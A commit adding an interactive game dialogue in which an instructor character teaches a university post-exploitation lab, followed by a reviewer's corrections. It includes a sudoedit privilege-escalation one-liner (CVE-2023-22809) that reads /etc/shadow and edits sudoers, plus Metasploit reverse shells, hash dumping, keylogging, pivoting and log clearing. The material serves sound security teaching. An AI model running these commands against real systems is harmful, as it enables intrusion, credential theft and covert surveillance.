feat: Add GBL post-exploitation techniques lab sheet

Z. Cliffe Schreuders
2025-11-19 18:24:26 +00:00
parent ab96da0731
commit 1a0539d432


@@ -0,0 +1,906 @@
// Post-exploitation Lab Sheet
// Based on HacktivityLabSheets: introducing_attacks/7_post-exploitation.md
// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio
// License: CC BY-SA 4.0
// Global persistent state
VAR instructor_rapport = 0
VAR post_exploit_mastery = 0
// External variables
EXTERNAL player_name
=== start ===
Advanced Tactics Instructor: Welcome, Agent {player_name}. I'm your instructor for Post-Exploitation Techniques.
~ instructor_rapport = 0
~ post_exploit_mastery = 0
Advanced Tactics Instructor: Post-exploitation is what happens after you gain initial access. It's about leveraging that foothold to gather information, escalate privileges, and achieve your objectives.
Advanced Tactics Instructor: Once an attacker has compromised a system, they can misuse the privileges they've appropriated to take further actions - or go on to compromise other connected systems.
Advanced Tactics Instructor: This lab completes the attack lifecycle - from initial exploitation through privilege escalation, information gathering, and pivoting to other systems.
Advanced Tactics Instructor: Remember: these are powerful techniques for authorized penetration testing and defensive security only.
~ post_exploit_mastery += 10
-> post_exploit_hub
=== post_exploit_hub ===
Advanced Tactics Instructor: What aspect of post-exploitation would you like to explore?
+ [What is post-exploitation?]
-> post_exploit_intro
+ [Understanding shell access]
-> shell_access
+ [Assessing your level of access]
-> assessing_access
+ [Post-exploitation information gathering]
-> info_gathering
+ [Privilege escalation techniques]
-> privilege_escalation
+ [Using the sudo vulnerability (CVE-2023-22809)]
-> sudo_vulnerability
+ [Metasploit post-exploitation modules]
-> msf_post_modules
+ [Introduction to Meterpreter]
-> meterpreter_intro
+ [Meterpreter spyware features]
-> meterpreter_spyware
+ [Pivoting and port forwarding]
-> pivoting
+ [Maintaining access and covering tracks]
-> persistence_evasion
+ [Show me the commands reference]
-> commands_reference
+ [Practical challenge tips]
-> challenge_tips
+ [I'm ready for the lab exercises]
-> ready_for_practice
+ [That's all for now]
#exit_conversation
-> END
=== post_exploit_intro ===
Advanced Tactics Instructor: Post-exploitation is everything that happens after you successfully compromise a system.
~ instructor_rapport += 5
Advanced Tactics Instructor: The initial exploit gives you a foothold - usually limited access as whatever user account the vulnerable software was running as.
Advanced Tactics Instructor: From there, you need to:
understand what level of access you have, gather information about the system, escalate privileges if possible, collect sensitive data, maintain access, and potentially pivot to other systems.
+ [Why not just stop after getting shell access?]
Advanced Tactics Instructor: Initial access is often limited. You might be running as a low-privilege user, not an administrator.
Advanced Tactics Instructor: You need to understand the system, find sensitive data, escalate to higher privileges, and ensure you can maintain access.
Advanced Tactics Instructor: In a real penetration test, you're demonstrating impact - showing what an attacker could actually DO with that access.
Advanced Tactics Instructor: That means accessing sensitive files, dumping credentials, and potentially moving laterally to other systems.
~ instructor_rapport += 5
+ [What determines what you can do post-exploitation?]
Advanced Tactics Instructor: Several factors determine your capabilities:
Advanced Tactics Instructor: First, the type of payload you used. A simple shell gives you command execution. Meterpreter gives you advanced features.
Advanced Tactics Instructor: Second, the security context - what user account is the vulnerable software running as?
Advanced Tactics Instructor: Third, the access controls in place. Are there additional restrictions beyond standard user permissions?
Advanced Tactics Instructor: Finally, your skill at the command line and understanding of the operating system.
~ instructor_rapport += 5
- -> post_exploit_hub
=== shell_access ===
Advanced Tactics Instructor: Shell access means you have access to a command line interface on the target system.
~ instructor_rapport += 5
Advanced Tactics Instructor: On Windows, this is typically a Command Prompt or PowerShell. On Unix/Linux systems, it's usually a Bash shell.
Advanced Tactics Instructor: Sometimes you'll see a familiar prompt. Other times you won't see any prompt at all, but you can still type commands and see output.
+ [What can I do with shell access?]
Advanced Tactics Instructor: With shell access, you can run almost any command-line program available on the system.
Advanced Tactics Instructor: You can list files, read documents, run scripts, check system information, create new files, and much more.
Advanced Tactics Instructor: However, you're limited by the permissions of whatever user account you're running as.
Advanced Tactics Instructor: If you're a normal user, you can't access administrator-only files or install system-wide software.
~ instructor_rapport += 5
+ [What commands should I avoid?]
Advanced Tactics Instructor: Avoid interactive programs that expect keyboard input and draw to the screen.
Advanced Tactics Instructor: For example, on Linux use "cat" instead of "less", because less expects you to scroll and press 'q' to quit.
Advanced Tactics Instructor: Avoid programs that run continuously until stopped, like "ping" without a count limit.
Advanced Tactics Instructor: Also be careful with Ctrl-C - it will likely kill your shell connection rather than just the current command.
~ instructor_rapport += 5
+ [What's the difference between shells on Windows and Linux?]
Advanced Tactics Instructor: Windows shells typically use backslashes in paths (C:\\Users\\), while Linux uses forward slashes (/home/).
Advanced Tactics Instructor: Common Windows commands: dir, type, net user, whoami, ipconfig
Advanced Tactics Instructor: Common Linux commands: ls, cat, whoami, id, ifconfig (or ip a)
Advanced Tactics Instructor: The privilege model is different too - Windows has Administrator/System, Linux has root (UID 0).
~ instructor_rapport += 5
- -> post_exploit_hub
=== assessing_access ===
Advanced Tactics Instructor: The first question after exploitation is: what level of access do I have?
~ instructor_rapport += 5
Advanced Tactics Instructor: You need to determine what user account you're running as and what privileges that account has.
Advanced Tactics Instructor: On Windows, you might have Administrator, System, or a regular user account. On Linux, you want to know if you're root (UID 0) or a normal user.
+ [How do I check my access level on Linux?]
Advanced Tactics Instructor: Use these commands to assess your Linux access:
Advanced Tactics Instructor: whoami - Shows your username
Advanced Tactics Instructor: id - Shows your user ID (UID), group ID (GID), and groups
Advanced Tactics Instructor: id -u - Shows just the UID. A UID of 0 means you're root!
Advanced Tactics Instructor: Any other UID means you're a normal user with standard access controls applying.
~ instructor_rapport += 5
+ [How do I check my access level on Windows?]
Advanced Tactics Instructor: On Windows, you can use:
Advanced Tactics Instructor: whoami - Shows your username and domain
Advanced Tactics Instructor: whoami /priv - Shows your privileges
Advanced Tactics Instructor: net user USERNAME - Shows details about a user account
Advanced Tactics Instructor: If you have Meterpreter: getuid and getprivs give detailed privilege information.
~ instructor_rapport += 5
+ [What if I don't have root or Administrator access?]
Advanced Tactics Instructor: That's very common! Most services run as unprivileged users for security reasons.
Advanced Tactics Instructor: You can still access files that user can read, which might include sensitive data.
Advanced Tactics Instructor: You can gather system information to look for privilege escalation opportunities.
Advanced Tactics Instructor: On Linux, try accessing /etc/shadow - if you can't, that confirms you're not root.
Advanced Tactics Instructor: Then you'll want to look for privilege escalation vulnerabilities.
~ instructor_rapport += 5
- -> post_exploit_hub
=== info_gathering ===
Advanced Tactics Instructor: Information gathering continues even after exploitation. Understanding the system helps you plan your next moves.
~ instructor_rapport += 5
Advanced Tactics Instructor: You want to learn about the operating system, installed software, network configuration, running processes, and other users.
+ [What system information should I gather on Linux?]
Advanced Tactics Instructor: Key commands for Linux information gathering:
Advanced Tactics Instructor: uname -a (kernel version and architecture)
Advanced Tactics Instructor: cat /proc/cpuinfo (CPU details)
Advanced Tactics Instructor: free -h (memory usage)
Advanced Tactics Instructor: df -h (disk usage and partitions)
Advanced Tactics Instructor: env (environment variables)
Advanced Tactics Instructor: cat /etc/passwd (list of user accounts)
Advanced Tactics Instructor: This information helps you understand the target and identify potential attack vectors.
~ instructor_rapport += 5
+ [Why check the sudo version?]
Advanced Tactics Instructor: The sudo command allows users to run commands with elevated privileges.
Advanced Tactics Instructor: Check the version with: sudo --version
Advanced Tactics Instructor: Certain versions of sudo have critical security vulnerabilities that allow privilege escalation!
Advanced Tactics Instructor: For example, CVE-2023-22809 affects sudo versions 1.8.0 through 1.9.12p1.
Advanced Tactics Instructor: Finding a vulnerable sudo version is a goldmine for privilege escalation.
~ instructor_rapport += 5
+ [What network information is useful?]
Advanced Tactics Instructor: Network information reveals what other systems you might be able to reach:
Advanced Tactics Instructor: ifconfig or ip a (network interfaces and IP addresses)
Advanced Tactics Instructor: netstat -an or ss -an (active connections and listening ports)
Advanced Tactics Instructor: route or ip route (routing table)
Advanced Tactics Instructor: cat /etc/resolv.conf (DNS configuration)
Advanced Tactics Instructor: This helps you identify other systems to pivot to or internal networks to explore.
~ instructor_rapport += 5
- -> post_exploit_hub
=== privilege_escalation ===
Advanced Tactics Instructor: Privilege escalation means gaining additional privileges you weren't intentionally granted.
~ instructor_rapport += 5
Advanced Tactics Instructor: Vertical privilege escalation is going from normal user to administrator/root. Horizontal privilege escalation is accessing resources of another user at the same privilege level.
Advanced Tactics Instructor: Privilege escalation exploits vulnerabilities in the kernel, system software, or misconfigurations.
+ [What are common privilege escalation vectors?]
Advanced Tactics Instructor: Common privilege escalation opportunities include:
Advanced Tactics Instructor: Vulnerable kernel versions with known local exploits
Advanced Tactics Instructor: Vulnerable system software like sudo, polkit, or services
Advanced Tactics Instructor: Misconfigured SUID binaries on Linux
Advanced Tactics Instructor: Weak file permissions on sensitive files
Advanced Tactics Instructor: Scheduled tasks running as administrators
Advanced Tactics Instructor: Credentials stored in plaintext or easily crackable formats
~ instructor_rapport += 5
+ [How do I find privilege escalation opportunities?]
Advanced Tactics Instructor: Systematic enumeration is key:
Advanced Tactics Instructor: Check kernel and software versions against CVE databases
Advanced Tactics Instructor: Look for SUID binaries: find / -perm -4000 2>/dev/null
Advanced Tactics Instructor: Check sudo permissions: sudo -l
Advanced Tactics Instructor: Look for world-writable files in sensitive directories
Advanced Tactics Instructor: Check for credentials in config files, bash history, and environment variables
~ instructor_rapport += 5
+ [Tell me about the sudo vulnerability]
-> sudo_vulnerability
- -> post_exploit_hub
=== sudo_vulnerability ===
Advanced Tactics Instructor: CVE-2023-22809 is a critical sudo vulnerability affecting versions 1.8.0 through 1.9.12p1.
~ instructor_rapport += 5
Advanced Tactics Instructor: The vulnerability is in sudoedit, which allows editing files with elevated privileges.
Advanced Tactics Instructor: By manipulating environment variables, you can trick sudoedit into opening files you shouldn't have access to.
+ [How does this vulnerability work?]
Advanced Tactics Instructor: The vulnerability exploits how sudoedit processes the EDITOR environment variable.
Advanced Tactics Instructor: Normally, sudoedit restricts which files you can edit. But a coding mistake means you can use "--" to specify additional files.
Advanced Tactics Instructor: For example: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts
Advanced Tactics Instructor: This tells sudoedit to use "cat" as the editor and tricks it into opening /etc/shadow with root privileges!
Advanced Tactics Instructor: The /etc/hosts file is just a decoy to satisfy sudoedit's normal operation.
~ instructor_rapport += 5
+ [How can I use this to escalate privileges?]
Advanced Tactics Instructor: First, you can read sensitive files: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts
Advanced Tactics Instructor: This gives you password hashes which you might crack offline.
Advanced Tactics Instructor: More powerfully, you can edit the sudoers file: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts
Advanced Tactics Instructor: Add a line like: distccd ALL=(ALL) NOPASSWD:ALL
Advanced Tactics Instructor: This allows your user to run any command as root without a password: sudo -i
Advanced Tactics Instructor: Now you're root!
~ instructor_rapport += 5
+ [What's tricky about exploiting this?]
Advanced Tactics Instructor: The challenge is that your simple shell doesn't support full interactive programs well.
Advanced Tactics Instructor: When you use vim to edit /etc/sudoers, the display will be distorted and arrow keys won't work properly.
Advanced Tactics Instructor: You need to carefully use vim commands without visual feedback:
"G" then "o" to go to bottom and insert new line, type your new line, "Esc" then ":x" to save.
Advanced Tactics Instructor: Be very careful - if you corrupt /etc/sudoers, you'll break the VM!
~ instructor_rapport += 5
- -> post_exploit_hub
=== msf_post_modules ===
Advanced Tactics Instructor: Metasploit has numerous post-exploitation modules for automated information gathering and attacks.
~ instructor_rapport += 5
Advanced Tactics Instructor: These modules run against established sessions to collect data, escalate privileges, or set up persistence.
Advanced Tactics Instructor: They're categorized by operating system and function: gather, escalate, manage, recon, and more.
+ [How do I use post-exploitation modules?]
Advanced Tactics Instructor: First, you need an active session. Background it with Ctrl-Z.
Advanced Tactics Instructor: Check your session ID: sessions
Advanced Tactics Instructor: Select a post module: use post/linux/gather/checkvm
Advanced Tactics Instructor: Set the session: setg SESSION 1 (or your session ID)
Advanced Tactics Instructor: Using "setg" sets it globally, so you don't have to set it for each module.
Advanced Tactics Instructor: Run the module: exploit (or run)
~ instructor_rapport += 5
+ [What useful post-exploitation modules exist?]
Advanced Tactics Instructor: For Linux targets, valuable modules include:
Advanced Tactics Instructor: post/linux/gather/checkvm - Detect if running in a VM
Advanced Tactics Instructor: post/linux/gather/enum_configs - Download config files
Advanced Tactics Instructor: post/linux/gather/enum_network - Network configuration
Advanced Tactics Instructor: post/linux/gather/enum_system - System and software information
Advanced Tactics Instructor: post/linux/gather/enum_users_history - Command history and logs
Advanced Tactics Instructor: post/linux/gather/hashdump - Dump password hashes
~ instructor_rapport += 5
+ [Where does collected information get stored?]
Advanced Tactics Instructor: Post-exploitation modules store collected data as "loot" in Metasploit's database.
Advanced Tactics Instructor: The module output tells you where files are saved, usually in ~/.msf4/loot/
Advanced Tactics Instructor: You can view loot with: loot
Advanced Tactics Instructor: Files are timestamped and categorized, making it easy to review later for report writing.
~ instructor_rapport += 5
- -> post_exploit_hub
=== meterpreter_intro ===
Advanced Tactics Instructor: Meterpreter is an advanced payload originally developed by Matt Miller (Skape).
~ instructor_rapport += 5
Advanced Tactics Instructor: Unlike a simple shell, Meterpreter provides a sophisticated remote administration framework with many built-in features.
Advanced Tactics Instructor: It's dynamically extensible - features can be loaded as needed. By default, it encrypts all communications.
+ [What makes Meterpreter special?]
Advanced Tactics Instructor: Meterpreter has numerous advantages over basic shells:
Advanced Tactics Instructor: Runs entirely in memory - doesn't write to disk, making forensics harder
Advanced Tactics Instructor: Encrypted communications by default
Advanced Tactics Instructor: Rich command set for file browsing, process manipulation, network operations
Advanced Tactics Instructor: Can migrate between processes to hide or achieve persistence
Advanced Tactics Instructor: Extensible with post-exploitation modules
Advanced Tactics Instructor: Includes "spyware" features like keylogging and screen capture
~ instructor_rapport += 5
+ [How do I use Meterpreter commands?]
Advanced Tactics Instructor: Start by viewing available commands: help
Advanced Tactics Instructor: Get current privileges: getuid and getprivs
Advanced Tactics Instructor: Browse files: ls c:/ (Windows) or ls / (Linux)
Advanced Tactics Instructor: Download files: download /path/to/file
Advanced Tactics Instructor: Upload files: upload /local/file /remote/file
Advanced Tactics Instructor: View processes: ps
Advanced Tactics Instructor: Migrate to another process: migrate PID
Advanced Tactics Instructor: Drop to a system shell: shell (Ctrl-D to return to Meterpreter)
~ instructor_rapport += 5
+ [How does Meterpreter avoid detection?]
Advanced Tactics Instructor: Meterpreter is designed for stealth:
Advanced Tactics Instructor: It stays in memory and doesn't write files to disk (fileless malware)
Advanced Tactics Instructor: By default it masquerades as "svchost.exe" on Windows, a common legitimate process
Advanced Tactics Instructor: It can migrate into other running processes, making it hard to identify
Advanced Tactics Instructor: Communications are encrypted, making network monitoring less effective
Advanced Tactics Instructor: However, modern endpoint detection systems can still identify Meterpreter through behavioral analysis.
~ instructor_rapport += 5
- -> post_exploit_hub
=== meterpreter_spyware ===
Advanced Tactics Instructor: Meterpreter includes features typically associated with spyware - monitoring user activity without their knowledge.
~ instructor_rapport += 5
Advanced Tactics Instructor: These features can capture keystrokes, screenshots, and even webcam feeds.
Advanced Tactics Instructor: While concerning for privacy, they're useful for security testing to demonstrate the risk of compromise.
+ [How does keylogging work in Meterpreter?]
Advanced Tactics Instructor: Meterpreter can capture all keystrokes on the target system.
Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Explore → Log Keystrokes
Advanced Tactics Instructor: Set CAPTURE_TYPE to "winlogon" to capture login attempts
Advanced Tactics Instructor: Via command line: keyscan_start (then keyscan_dump to view results)
Advanced Tactics Instructor: This captures everything typed - passwords, emails, documents, searches.
~ instructor_rapport += 5
+ [How do I capture screenshots?]
Advanced Tactics Instructor: Screenshots show what the user is viewing:
Advanced Tactics Instructor: screenshot - Captures current screen
Advanced Tactics Instructor: The image is downloaded to your Kali system and automatically opened
Advanced Tactics Instructor: This can reveal sensitive documents, credentials, or user behavior
Advanced Tactics Instructor: In Armitage, there are menu options for screen capture in the Meterpreter menu.
~ instructor_rapport += 5
+ [Can I get full graphical control?]
Advanced Tactics Instructor: Yes! You can use VNC for full graphical remote control:
Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Interact → Desktop (VNC)
Advanced Tactics Instructor: Armitage starts a VNC server on the target and tells you the port
Advanced Tactics Instructor: Connect with: vncviewer 127.0.0.1:PORT
Advanced Tactics Instructor: You'll see and control the target's desktop just like sitting at their keyboard!
Advanced Tactics Instructor: This is powerful but obvious to any user who's watching their screen.
~ instructor_rapport += 5
- -> post_exploit_hub
=== pivoting ===
Advanced Tactics Instructor: Pivoting means using a compromised system as a stepping stone to attack other systems.
~ instructor_rapport += 5
Advanced Tactics Instructor: Often attackers can't directly reach internal systems - firewalls, NAT, and network segmentation block direct access.
Advanced Tactics Instructor: But if you compromise a system that CAN reach those internal systems, you can route your attacks through it.
+ [Why would I need to pivot?]
Advanced Tactics Instructor: Several scenarios require pivoting:
Advanced Tactics Instructor: Attacking internal systems from a compromised public-facing server
Advanced Tactics Instructor: Accessing networks behind firewalls or NAT
Advanced Tactics Instructor: Moving laterally through a corporate network
Advanced Tactics Instructor: Hiding your true origin by routing through multiple compromised hosts
Advanced Tactics Instructor: In real penetration tests, you often start from a DMZ server and need to pivot to reach critical internal systems.
~ instructor_rapport += 5
+ [How does Meterpreter pivoting work?]
Advanced Tactics Instructor: Meterpreter can set up routing so all your attacks go through a compromised host.
Advanced Tactics Instructor: In Armitage: Right-click compromised host → Meterpreter → Pivoting → Setup → Add Pivot
Advanced Tactics Instructor: Via command line, you use the "route" command in msfconsole
Advanced Tactics Instructor: Once configured, any Metasploit attacks you launch will be routed through that system
Advanced Tactics Instructor: The pivoted attacks will appear to come from the compromised system, not your Kali VM.
~ instructor_rapport += 5
+ [What's port forwarding?]
Advanced Tactics Instructor: Port forwarding is a simpler form of pivoting.
Advanced Tactics Instructor: You instruct a compromised system to listen on a port and forward connections to a different host and port.
Advanced Tactics Instructor: For example, forward local port 8080 to an internal web server on 10.0.0.5:80
Advanced Tactics Instructor: This makes the internal service accessible through the compromised system.
Advanced Tactics Instructor: Meterpreter's portfwd command handles this: portfwd add -l 8080 -p 80 -r 10.0.0.5
~ instructor_rapport += 5
- -> post_exploit_hub
=== persistence_evasion ===
Advanced Tactics Instructor: Maintaining access and covering tracks are advanced post-exploitation techniques.
~ instructor_rapport += 5
Advanced Tactics Instructor: Persistence means ensuring you can regain access even if the system reboots or the service is restarted.
Advanced Tactics Instructor: Covering tracks means removing evidence of the attack from logs and the filesystem.
+ [How do attackers maintain access?]
Advanced Tactics Instructor: Common persistence mechanisms include:
Advanced Tactics Instructor: Creating new user accounts with administrative privileges
Advanced Tactics Instructor: Installing backdoors that run on boot (services, scheduled tasks, startup scripts)
Advanced Tactics Instructor: Modifying SSH authorized_keys to allow your key
Advanced Tactics Instructor: Installing rootkits that hide processes and files
Advanced Tactics Instructor: Meterpreter has post-exploitation modules specifically for persistence.
~ instructor_rapport += 5
+ [How do you cover your tracks?]
Advanced Tactics Instructor: Covering tracks involves removing or modifying evidence:
Advanced Tactics Instructor: Clearing log files (on Linux: /var/log/auth.log, /var/log/syslog, etc.)
Advanced Tactics Instructor: Clearing command history (bash history, PowerShell history)
Advanced Tactics Instructor: Removing uploaded tools and malware
Advanced Tactics Instructor: Modifying file timestamps to match surrounding files
Advanced Tactics Instructor: However, sophisticated forensics can often detect these modifications.
~ instructor_rapport += 5
+ [Does Meterpreter have anti-forensics features?]
Advanced Tactics Instructor: Yes, Meterpreter is designed with anti-forensics in mind:
Advanced Tactics Instructor: It runs in memory without writing to disk (fileless)
Advanced Tactics Instructor: It can migrate between processes, making it hard to find
Advanced Tactics Instructor: Communications are encrypted
Advanced Tactics Instructor: There are modules to clear event logs: clearev
Advanced Tactics Instructor: However, modern endpoint detection and response (EDR) tools can detect Meterpreter through behavioral analysis.
~ instructor_rapport += 5
- -> post_exploit_hub
=== commands_reference ===
Advanced Tactics Instructor: Let me provide a comprehensive post-exploitation commands reference.
~ instructor_rapport += 5
Advanced Tactics Instructor: **Initial Exploitation (Distcc example):**
Advanced Tactics Instructor: nmap -p 1-65535 TARGET (scan all ports)
Advanced Tactics Instructor: msfconsole
Advanced Tactics Instructor: search distccd
Advanced Tactics Instructor: use exploit/unix/misc/distcc_exec
Advanced Tactics Instructor: set RHOST TARGET_IP
Advanced Tactics Instructor: set PAYLOAD cmd/unix/reverse
Advanced Tactics Instructor: set LHOST YOUR_IP
Advanced Tactics Instructor: exploit
+ [Show me access assessment commands]
Advanced Tactics Instructor: **Assessing Access Level:**
Advanced Tactics Instructor: whoami (show username)
Advanced Tactics Instructor: id (show UID, GID, groups)
Advanced Tactics Instructor: id -u (show just UID - 0 means root)
Advanced Tactics Instructor: cat /etc/shadow (try to read - if fails, not root)
~ instructor_rapport += 3
+ [Show me information gathering commands]
Advanced Tactics Instructor: **Information Gathering (Linux):**
Advanced Tactics Instructor: env (environment variables)
Advanced Tactics Instructor: uname -a (kernel version)
Advanced Tactics Instructor: cat /proc/cpuinfo (CPU info)
Advanced Tactics Instructor: free -h (memory)
Advanced Tactics Instructor: df -h (disk space)
Advanced Tactics Instructor: cat /etc/passwd (user accounts)
Advanced Tactics Instructor: sudo --version (check for vulnerable sudo)
Advanced Tactics Instructor: ifconfig or ip a (network interfaces)
~ instructor_rapport += 3
+ [Show me privilege escalation commands]
Advanced Tactics Instructor: **Privilege Escalation (CVE-2023-22809):**
Advanced Tactics Instructor: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts
Advanced Tactics Instructor: (View password hashes)
Advanced Tactics Instructor: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts
Advanced Tactics Instructor: (Edit sudoers file - be very careful!)
Advanced Tactics Instructor: In vim: Press Enter, type "Go", press Enter, type "distccd ALL=(ALL) NOPASSWD:ALL"
Advanced Tactics Instructor: Press Esc, type ":x", press Enter, press Esc, type ":q!", press Enter
Advanced Tactics Instructor: sudo -i (escalate to root)
~ instructor_rapport += 3
+ [Show me Linux admin commands]
Advanced Tactics Instructor: **Linux Post-Exploitation:**
Advanced Tactics Instructor: useradd USERNAME (create user)
Advanced Tactics Instructor: passwd USERNAME (set password)
Advanced Tactics Instructor: cat /etc/passwd (list users)
Advanced Tactics Instructor: sh (spawn command interpreter)
~ instructor_rapport += 3
+ [Show me Metasploit post modules]
Advanced Tactics Instructor: **Metasploit Post-Exploitation:**
Advanced Tactics Instructor: Ctrl-Z (background session)
Advanced Tactics Instructor: sessions (list sessions)
Advanced Tactics Instructor: use post/linux/gather/checkvm
Advanced Tactics Instructor: setg SESSION 1
Advanced Tactics Instructor: exploit
Advanced Tactics Instructor: **Useful Post Modules:**
Advanced Tactics Instructor: post/linux/gather/enum_configs
Advanced Tactics Instructor: post/linux/gather/enum_network
Advanced Tactics Instructor: post/linux/gather/enum_system
Advanced Tactics Instructor: post/linux/gather/enum_users_history
Advanced Tactics Instructor: post/linux/gather/hashdump
~ instructor_rapport += 3
+ [Show me Meterpreter commands]
Advanced Tactics Instructor: **Meterpreter Commands:**
Advanced Tactics Instructor: help (list all commands)
Advanced Tactics Instructor: getuid (current user)
Advanced Tactics Instructor: getprivs (privileges)
Advanced Tactics Instructor: ls c:/ (browse files)
Advanced Tactics Instructor: download FILE (download file)
Advanced Tactics Instructor: upload LOCAL REMOTE (upload file)
Advanced Tactics Instructor: ps (list processes)
Advanced Tactics Instructor: migrate PID (migrate to process)
Advanced Tactics Instructor: shell (drop to system shell, Ctrl-D to return)
Advanced Tactics Instructor: run post/windows/gather/hashdump (dump hashes)
Advanced Tactics Instructor: screenshot (capture screen)
Advanced Tactics Instructor: keyscan_start / keyscan_dump (keylogging)
~ instructor_rapport += 3
+ [Show me Armitage commands]
Advanced Tactics Instructor: **Armitage Setup:**
Advanced Tactics Instructor: sudo msfdb reinit
Advanced Tactics Instructor: sudo armitage &
Advanced Tactics Instructor: **Armitage Workflow:**
Advanced Tactics Instructor: Hosts → Add Host → enter IP
Advanced Tactics Instructor: Right-click host → Scan
Advanced Tactics Instructor: Drag exploit onto target icon → Launch
Advanced Tactics Instructor: Right-click compromised host → Meterpreter → Interact
Advanced Tactics Instructor: **Pivoting:**
Advanced Tactics Instructor: Right-click → Meterpreter → Pivoting → Setup → Add Pivot
~ instructor_rapport += 3
- -> post_exploit_hub
=== challenge_tips ===
Advanced Tactics Instructor: Let me give you practical tips for the post-exploitation challenges.
~ instructor_rapport += 5
Advanced Tactics Instructor: **Exploiting Distcc:**
Advanced Tactics Instructor: Scan all ports to find distcc: nmap -p- TARGET
Advanced Tactics Instructor: Use exploit/unix/misc/distcc_exec with cmd/unix/reverse payload
Advanced Tactics Instructor: You'll get a shell as the distccd user, not root.
+ [Tips for privilege escalation?]
Advanced Tactics Instructor: Check the sudo version immediately: sudo --version
Advanced Tactics Instructor: If it's vulnerable (1.8.0-1.9.12p1), use the CVE-2023-22809 exploit.
Advanced Tactics Instructor: When editing /etc/sudoers with vim, follow the commands EXACTLY - one wrong keystroke can break the VM.
Advanced Tactics Instructor: After editing sudoers, run: sudo -i to become root.
Advanced Tactics Instructor: Verify with: id -u (should show 0)
~ instructor_rapport += 5
+ [Tips for using post-exploitation modules?]
Advanced Tactics Instructor: Always background your session first with Ctrl-Z
Advanced Tactics Instructor: Use "setg SESSION ID" to set the session globally for all modules.
Advanced Tactics Instructor: Run multiple enum modules to gather comprehensive information.
Advanced Tactics Instructor: The output tells you where loot is stored - check those files!
Advanced Tactics Instructor: Not all modules work perfectly - if one fails, move on to others.
~ instructor_rapport += 5
+ [Tips for using Meterpreter and Armitage?]
Advanced Tactics Instructor: Exploit the Windows server with easyftp to get a Meterpreter session.
Advanced Tactics Instructor: Use getuid and getprivs to understand your privileges immediately.
Advanced Tactics Instructor: Browse to user desktops to find flags: ls C:\\Users\\
Advanced Tactics Instructor: Try both Meterpreter commands and Armitage's GUI features.
Advanced Tactics Instructor: If Meterpreter becomes unresponsive, restart the Windows VM and re-exploit.
~ instructor_rapport += 5
+ [Tips for pivoting?]
Advanced Tactics Instructor: Set up a pivot through the Windows system to attack Linux.
Advanced Tactics Instructor: In Armitage: Right-click Windows → Meterpreter → Pivoting → Setup → Add Pivot
Advanced Tactics Instructor: Add the Linux target: Hosts → Add Hosts → enter Linux IP
Advanced Tactics Instructor: Scan and exploit through the pivot - it will be slower but will work.
Advanced Tactics Instructor: The Armitage interface shows the routing path visually.
~ instructor_rapport += 5
+ [Where are the flags?]
Advanced Tactics Instructor: Linux flags are in user home directories under /home/
Advanced Tactics Instructor: Use find /home -name "*flag*" to search for them.
Advanced Tactics Instructor: Windows flags are on user Desktops: C:\\Users\\USERNAME\\Desktop\\
Advanced Tactics Instructor: One Linux challenge involves cracking a protected.zip file.
Advanced Tactics Instructor: You'll need to dump password hashes and crack them to get the zip password.
~ instructor_rapport += 5
- -> post_exploit_hub
=== ready_for_practice ===
Advanced Tactics Instructor: Excellent! You're ready for advanced post-exploitation techniques.
~ instructor_rapport += 10
~ post_exploit_mastery += 10
Advanced Tactics Instructor: This lab completes your understanding of the full attack lifecycle - from initial reconnaissance through exploitation to post-exploitation.
Advanced Tactics Instructor: You'll exploit systems, escalate privileges, gather sensitive data, and pivot through networks.
Advanced Tactics Instructor: Remember: these techniques are powerful and potentially destructive. Use them only for authorized penetration testing and defensive security.
+ [Any final advice?]
Advanced Tactics Instructor: Work methodically. After each exploitation, assess your access, gather information, then escalate privileges.
Advanced Tactics Instructor: Take careful notes of what you find - credentials, software versions, vulnerable services.
Advanced Tactics Instructor: When using the sudo privilege escalation, follow the vim commands EXACTLY. Practice on a non-critical system first if you're nervous.
Advanced Tactics Instructor: Explore both Meterpreter commands and Armitage's interface to see which you prefer.
Advanced Tactics Instructor: Don't get frustrated if something doesn't work - exploit reliability varies. Try restarting VMs and trying again.
Advanced Tactics Instructor: Most importantly: understand WHY each technique works, not just HOW to execute it.
Advanced Tactics Instructor: Good luck, Agent {player_name}. This is where you demonstrate the full impact of system compromise.
~ instructor_rapport += 10
- -> post_exploit_hub
-> END
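Review bot: the port-forwarding explanation in the pivoting knot puts the listener on the wrong end. `portfwd add -l 8080 -p 80 -r 10.0.0.5` opens port 8080 on the Metasploit host (the `-l` port is local to the attacker) and tunnels connections through the Meterpreter session to 10.0.0.5:80; it does not make the compromised system listen, which is what a reverse forward (`portfwd add -R`) would do. Suggest rewording "You instruct a compromised system to listen on a port and forward connections to a different host and port" to "You open a port on your Kali machine and tunnel connections through the session to an internal host and port", and telling the student to then browse to http://127.0.0.1:8080 on Kali. Two smaller accuracy points in the same file: `clearev` is a built-in Meterpreter command on Windows sessions (it clears the Application, System and Security event logs), not a post module, so "There are modules to clear event logs: clearev" should say "the clearev command"; and the vim key sequence is given two different ways, "G" then "o" in the sudo knot versus "Go" then Enter in the commands reference, which inserts a blank line first. Harmless in /etc/sudoers, but since the sheet tells students to follow the keystrokes EXACTLY, the two should match.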